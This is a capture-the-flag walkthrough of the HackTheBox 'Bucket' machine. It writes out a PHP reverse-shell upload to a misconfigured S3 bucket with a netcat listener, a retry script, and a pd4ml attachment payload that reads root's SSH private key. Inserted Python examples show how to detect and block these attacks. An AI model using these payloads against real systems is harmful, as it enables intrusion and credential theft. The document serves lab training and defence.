Bucket HackTheBox WalkThrough
This is the Bucket HackTheBox machine walkthrough. In this writeup I have demonstrated step by step how I rooted the Bucket HackTheBox machine. Before starting, let us know something about this machine. It is a Linux box with IP address 10.10.10.212 and difficulty Medium assigned by its maker.
First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Bucket machine by pinging its IP 10.10.10.212. If all goes correctly then it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability assessment too. I have used nmap for this task and the result is given below:
Scanning
$ sudo nmap -sC -sV -oN bucket.nmap 10.10.10.212
Nmap revealed ports 22 & 80 as open. OpenSSH is running on port 22 and the Apache2 webserver is running on port 80. Since Apache2 is running on port 80 we should have some website running at http://10.10.10.212. Going to this URL, I found a redirection to http://bucket.htb. So, before proceeding with further enumeration we have to add bucket.htb pointing to IP 10.10.10.212 in our hosts file, which is located in the directory /etc/. I added this record to my hosts file.
Host File After Modification
$ cat /etc/hosts
Going to http://bucket.htb, I found the heading Bucket Advertising Platform and an email address [email protected]. There is no use for the email here because we don't have ports 25, 110 and 143 open.
I checked the page source of this page and got a new subdomain s3.bucket.htb. So before going further I added this subdomain to my hosts file.
Host File after Modification
$ cat /etc/hosts
Going to the URL http://s3.bucket.htb, I found {Status: running}. It appears that something is running. Since it is S3 and there is also a hint in the box name, it must be an AWS (Amazon Web Services) S3 bucket. Although we now know that it is using an S3 bucket, we don't have anything to enumerate on, so nothing is left except directory bruteforcing and fuzzing.
Directory Bruteforcing
$ sudo dirsearch -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://s3.bucket.htb/ -t 50 -e all | tee raft-medium.out
Directory bruteforcing found a folder shell. Going to this folder at the URL http://s3.bucket.htb/shell/, I found the DynamoDB JavaScript Shell. After some googling I found a way by which we can enumerate the content of the table users from this shell. Check this link at StackOverflow. Simply put the following code into the editor and click on run to execute the code. You will get the details of all the items inside the table users.
var dynamodb = new AWS.DynamoDB({region: 'us-east-1', endpoint: "http://s3.bucket.htb"});
var tableName = "users";
var params = {TableName: tableName, Select: "ALL_ATTRIBUTES"};

function doScan(response) {
    if (response.error) {
        ppJson(response.error); // an error occurred
    } else {
        ppJson(response.data); // successful response
        // More data. Keep calling scan.
        if ('LastEvaluatedKey' in response.data) {
            response.request.params.ExclusiveStartKey = response.data.LastEvaluatedKey;
            dynamodb.scan(response.request.params)
                .on('complete', doScan)
                .send();
        }
    }
}

console.log("Starting a Scan of the table");
dynamodb.scan(params).on('complete', doScan).send();
From the above output we have found credentials:
Mgmt : Management@#1@#
Cloudadm : Welcome123!
Sysadm : n2vM-<_K_Q:.Aa2
I didn't know which of these were the right creds for SSH. I tried to SSH with each of them one by one and even tested all the combinations for SSH using hydra (an online brute forcer), but no valid SSH credential was found. So our enumerated credentials are useless for now. Anyway, I added these credentials to my CherryTree notes; maybe they will be useful at some other point in further enumeration.
After some further enumeration I found a way by which we can enumerate the webserver and its files inside the bucket using awscli, the AWS command line tool. To use the awscli tool we first have to configure it with valid AWS credentials. The required credentials are AWS Access Key ID, AWS Secret Access Key, Default region name & Default output format (to install the awscli tool use $ sudo apt install awscli). Here, the AWS S3 bucket is misconfigured and anyone with any fake credential can access the webserver running on this S3 bucket.
Using fake credentials I was also able to access the webserver running in this bucket. I could even upload a reverse shell onto this webserver and execute it to get a connection back to my machine.
To get a reverse shell do the following things.
1. Configure the awscli for first use using fake credentials. For more info check this article at Amazon.
Accessing AWS Bucket Through Aws CLI
$ aws configure
AWS Access Key ID: AKIAI44QH8DHBEXAMPLE
AWS Secret Access Key: je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY
Default region name: us-east-1
Default output format: text
2. List the content of S3 bucket at http://s3.bucket.htb
$ aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request
The adserver webserver is running in the bucket at s3.bucket.htb.
3. List the content in the adserver bucket.
$ aws s3 ls --recursive --human-readable s3://adserver --endpoint-url http://s3.bucket.htb/
4. Copy your php-reverse-shell script into the images folder using the cp command of aws [don't forget to change the IP address to your tun0 IP in the php-reverse-shell script. The PHP shell can be found in your Kali OS in the directory /usr/share/webshells/php/].
$ aws s3 cp ~/HTB/Boxes/Bucket/shell.php s3://adserver/images/shell.php --endpoint-url http://s3.bucket.htb/
5. List the files of the images folder to confirm whether our reverse shell is uploaded in the adserver bucket or not.
$ aws s3 ls s3://adserver/images/ --endpoint-url http://s3.bucket.htb/
6. Start a netcat listener on your Kali machine.
$ nc -nvlp 1234
7. Execute the Shell
$ curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell.php
There is probably a cron job that deletes the shell as soon as we upload it. So I have created a script that does this job very fast, and you can get a shell using the script below.
Note: You may need to run this script 2 to 3 times to get a shell. Before running this script, start your netcat listener on the port you specified in your shell script.
#!/bin/bash
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

echo "List Files."
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

## Copying file from local computer to Bucket
aws --endpoint-url http://s3.bucket.htb/ s3 cp shell.php s3://adserver/images/shell.php

echo "Checking if file is uploaded"
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver

# Checking if file exists on web server
echo "Checking on s3.bucket"
curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell.php

resp=404
# Executing the shell multiple times until we get response code 200
while [[ $resp -eq 404 ]]; do
    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null http://bucket.htb/images/shell.php)
    echo "$resp"
    sleep 0.1
done
$ bash exploit.sh
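From the defender's side, the upload-and-poll pattern above leaves a clear trace in the Apache access log: a script file requested under a path that should only ever hold static images, first answered with 404s and then with a 200 once the cron cleanup loses the race. The following Python is an added detection example, not part of the original writeup or of the box; the log lines are constructed, and the static-prefix and extension lists are assumptions about the site layout.

```python
import re

# Apache "combined"-style access log. The sample below is constructed for this
# example; it is not from the box. The bucket is synced into the web root, so a
# .php object dropped under images/ is served and executed by Apache.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumed site layout: these prefixes should only ever hold static content.
STATIC_PREFIXES = ("/images/",)
SCRIPT_EXTS = (".php", ".phtml", ".phar")

SAMPLE_LOG = """\
10.10.14.5 - - [10/Dec/2020:10:01:02 +0000] "GET /images/bug.jpg HTTP/1.1" 200 3213
10.10.14.5 - - [10/Dec/2020:10:01:03 +0000] "GET /images/shell.php HTTP/1.1" 404 196
10.10.14.5 - - [10/Dec/2020:10:01:03 +0000] "GET /images/shell.php HTTP/1.1" 404 196
10.10.14.5 - - [10/Dec/2020:10:01:04 +0000] "GET /images/shell.php HTTP/1.1" 200 0
10.10.14.5 - - [10/Dec/2020:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 5344
"""

def parse_line(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec

def script_requests(log_text):
    """Requests for a script extension under a static-only prefix."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0].lower()
        if path.startswith(STATIC_PREFIXES) and path.endswith(SCRIPT_EXTS):
            hits.append(rec)
    return hits

def executed_scripts(log_text):
    """Paths that answered 2xx: the dropped file existed and Apache ran it.
    Repeated 404s for the same path just before show the upload-and-poll race."""
    return sorted({h["path"] for h in script_requests(log_text) if h["status"] // 100 == 2})

def poll_counts(log_text):
    """How many times each flagged path was requested (the 0.1s retry loop)."""
    counts = {}
    for h in script_requests(log_text):
        counts[h["path"]] = counts.get(h["path"], 0) + 1
    return counts
```

A cron job that deletes stray files is not a control; the durable fixes are not syncing a writable bucket into a PHP-enabled web root and disabling script execution under images/.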
We have got a user shell as user www-data. Let us upgrade it to a fully interactive Linux shell so that we can run more advanced Linux commands through it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ ^Z
# CTRL+Z To background the shell
$ stty raw -echo
$ fg
# Plus two times enter to foreground the shell
$ stty rows 38 columns 116
We have three credentials enumerated earlier. Let us try to switch to user roy using them one by one. roy : n2vM-<_K_Q:.Aa2 are the valid creds, so let us switch to roy. This is also a valid SSH credential. In case you lose your shell, use this credential to get back in over SSH.
Switching to User Roy
$ su roy
Password: n2vM-<_K_Q:.Aa2
$ whoami
Capture User Flag
$ cd ~
$ cat user.txt
Privilege Escalation
To escalate privilege to root we first have to find a privilege escalation vector. For this I ran linpeas.sh (a post-exploitation enumeration script) on the Bucket machine. It finds information about all the potential PrivEsc vectors that can be used to escalate privilege to root.
Finding PrivEsc Vector
Linpeas suspected that the directory /var/www/bucket-app/aws/ has something suspicious that can be used to escalate privilege. I didn't know exactly why linpeas was suspecting it to be our potential PrivEsc vector. Let us check it manually and confirm whether we would get root using this or not.
The index.php file inside the directory /var/www/bucket-app/ gave some information about a table alerts and an internal port 4566 as an endpoint. Since bucket-app is placed inside the public folder and apache2 is running, there may be a chance of an internal webserver running on this port. We will confirm it using the netstat command.
$ netstat -punta
revealed that some unusual ports, 4566 & 8000, are listening locally.
To access the services running over these ports we have to forward them to our local machine so that we can access them in our web browser. We have the SSH credential of user roy, which is roy : n2vM-<_K_Q:.Aa2, so we can use local port forwarding to reach these services from our local machine. Let us perform local port forwarding.
Performing Local Port Forwarding
$ ssh -L 8000:127.0.0.1:8000 -L 4566:127.0.0.1:4566 [email protected]
Password: n2vM-<_K_Q:.Aa2
$ ss -lnpt
# Check for listening port on your local machine
We have successfully forwarded the ports to our Kali machine, as can be confirmed by the $ ss -lnpt command on our Kali machine. Now we can check the services running on ports 8000 and 4566 in our web browser by visiting the URLs http://127.0.0.1:8000/ & http://127.0.0.1:4566 .
Under construction is shown at the URL http://127.0.0.1:8000.
Running status is shown at the URL http://127.0.0.1:4566 . Let us again check the file index.php at /var/www/bucket-app/ for more information.
According to this file, it makes a POST request after accepting some data from the table alerts. This table also requires some additional values like Ransomware, get_alerts() and file in the POST data. We will exploit this feature to get the private SSH key of the root user. For more info about how this page functions you can check this article.
So, to exploit this feature and get the root user's private key I did the following things.
1. Created a new DynamoDB table alerts.
2. Inserted the values as requested, along with our payload, in the table alerts.
3. At last, made POST requests with some additional data as requested.
I have created a script to perform this job. Just copy the script into a file, save it with the extension .sh and execute it.
#!/bin/bash
echo "Creating New Table"
echo "======================================"
# Creating New Table alerts
aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566

echo "======================================"
echo "Writing Data to alerts and putting in the file attacked.txt"
# Writing Data to table alerts
aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' --endpoint-url http://127.0.0.1:4566

echo "======================================"
echo "Making Post Requests"
# Making Post Request with data "action=get_alerts"
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/index.php

echo "Done"
echo "Go to http://127.0.0.1:8000/files/ and download the attachment"
$ bash command.sh
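The root cause on the defender's side is that HTML stored in the alerts table reaches the pd4ml renderer unchecked, and pd4ml's attachment directive will embed whatever URI it is given, including file://. The following Python is an added example of the kind of input validation bucket-app would need before rendering; it is not the app's own code (its index.php is not shown on this page) and the allowed schemes and attribute names are assumptions. It rejects any pd4ml: element and any non-http(s) URI in the stored data.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical validator for HTML stored in the alerts table (the real
# bucket-app index.php is not shown on the page). pd4ml turns
# <pd4ml:attachment>URI</pd4ml:attachment> into "embed this resource", so an
# attacker who can write to the table can make the renderer read any local file.
ALLOWED_SCHEMES = {"http", "https"}
URI_ATTRS = {"src", "href", "data", "background"}

class AlertInspector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.problems = []
        self._in_attachment = False

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag names, so PD4ML:Attachment is caught too.
        if tag.startswith("pd4ml:"):
            self.problems.append(f"renderer directive <{tag}> not allowed")
            self._in_attachment = True
        for name, value in attrs:
            if name in URI_ATTRS and value:
                self._check_uri(value)

    def handle_endtag(self, tag):
        if tag.startswith("pd4ml:"):
            self._in_attachment = False

    def handle_data(self, data):
        # The attachment's text content is the URI, e.g. file:///root/.ssh/id_rsa
        if self._in_attachment:
            self._check_uri(data.strip())

    def _check_uri(self, uri):
        scheme = urlparse(uri).scheme.lower()
        if scheme and scheme not in ALLOWED_SCHEMES:
            self.problems.append(f"non-web URI scheme {scheme!r}: {uri}")

def alert_problems(html_fragment):
    """List every reason the fragment must not reach the PDF renderer."""
    p = AlertInspector()
    p.feed(html_fragment)
    p.close()
    return p.problems

def is_safe_alert(html_fragment):
    return not alert_problems(html_fragment)
```

Blocking the directive is a stopgap; alert text should be HTML-escaped rather than rendered, and the renderer should run as a low-privilege user with no access to /root.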
Let us go to the URL http://127.0.0.1/files/result.pdf to download the attachment by clicking on the pin icon.
The attachment is the id_rsa key of the root user.
$ cat ~/Downloads/id_rsa
Let us use this SSH private key to log in as root to the Bucket machine.
Getting Root Shell
$ cp ~/Downloads/id_rsa .
$ chmod 400 id_rsa
$ ssh -i id_rsa [email protected]
# whoami && id
We are root now; let us capture the root flag.
Capture Root Flag
# cat root.txt
This was how I rooted the Bucket HackTheBox machine. I learnt a lot during this challenge and hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. For any query or suggestion about the writeup, feel free to write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/ .